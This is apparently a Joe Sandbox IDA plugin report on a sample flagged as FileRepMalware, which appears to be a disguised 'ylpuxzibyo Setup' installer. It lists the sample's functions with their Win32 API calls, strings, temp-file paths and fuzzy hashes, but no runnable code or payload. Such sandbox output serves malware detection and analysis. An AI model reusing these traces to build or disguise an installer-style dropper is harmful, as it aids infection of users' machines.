Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: mo$F$ylpuxzibyo Setup
API String ID: 941294808-1545505820
Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405915 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
GetShortPathNameA.KERNEL32(?,0042C230,00000400), ref: 0040596B
GetShortPathNameA.KERNEL32(00000000,0042BCA8,00000400), ref: 00405988
wsprintfA.USER32 ref: 004059A6
GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
GlobalFree.KERNEL32(00000000), ref: 00405A65
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C

Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A

Strings

%s=%s, xrefs: 0040599C
mo, xrefs: 004059AE
[Rename], xrefs: 00405A16, 00405A28

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
String ID: mo$%s=%s$[Rename]
API String ID: 3445103937-1993660514
Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE9 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
GetSystemDirectoryA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000400), ref: 00405D0C
GetWindowsDirectoryA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000400), ref: 00405D1F
SHGetSpecialFolderLocation.SHELL32(?,0041924B), ref: 00405D5B
SHGetPathFromIDListA.SHELL32(0041924B,"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ), ref: 00405D69
CoTaskMemFree.OLE32(0041924B), ref: 00405D74
lstrcatA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
lstrlenA.KERNEL32("C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" ,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CDB
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D90
"C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" , xrefs: 00405C12, 00405CD9, 00405CF6, 00405D0B, 00405D1E, 00405D3A, 00405D65, 00405D95, 00405D9B, 00405DB3, 00405DC6, 00405DE1, 00405DE7, 00405DF2, 00405E1C
I|o, xrefs: 00405BF6

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" $I|o$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-11988235
Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E29 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405E81
CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
CharNextA.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405E93
CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403105,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 00405EA3

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E2A, 00405E2F
*?|<>/":, xrefs: 00405E71
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 00405E65

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-1286990196
Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00403EEA Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403F07
GetSysColor.USER32(00000000), ref: 00403F23
SetTextColor.GDI32(?,00000000), ref: 00403F2F
SetBkMode.GDI32(?,?), ref: 00403F3B
GetSysColor.USER32(?), ref: 00403F4E
SetBkColor.GDI32(?,?), ref: 00403F5E
DeleteObject.GDI32(?), ref: 00403F78
CreateBrushIndirect.GDI32(?), ref: 00403F82

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004026AF Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00014E00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
GlobalFree.KERNEL32(?), ref: 00402758
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
GlobalFree.KERNEL32(00000000), ref: 00402771
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB3 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041924B,771B23A0), ref: 00404F0F
SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004038E3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,ylpuxzibyo Setup), ref: 0040397B

Strings

ylpuxzibyo Setup, xrefs: 0040396A
mo, xrefs: 00403901
1033, xrefs: 004038E7, 004038F1, 00403962
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe", xrefs: 004038E4
I|o, xrefs: 00403958

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: TextWindow
String ID: mo$"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$1033$I|o$ylpuxzibyo Setup
API String ID: 530164218-553091657
Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404782 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
GetMessagePos.USER32 ref: 004047A5
ScreenToClient.USER32(?,?), ref: 004047BF
SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7

Strings

f, xrefs: 004047D3

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B6E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
MulDiv.KERNEL32(00066A0C,00000064,00066A10), ref: 00402BB4
wsprintfA.USER32 ref: 00402BC4
SetWindowTextA.USER32(?,?), ref: 00402BD4
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6

Strings

verifying installer: %d%%, xrefs: 00402BBE

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95

Uniqueness

Uniqueness Score: -1.00%

Function 00402A69 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
RegCloseKey.ADVAPI32(?), ref: 00402ACF
RegCloseKey.ADVAPI32(?), ref: 00402AF4
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32(00000000,?), ref: 00401CEF
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79

Uniqueness

Uniqueness Score: -1.00%

Function 00404678 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
wsprintfA.USER32 ref: 0040471E
SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731

Strings

%u.%u%s%s, xrefs: 00404700

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
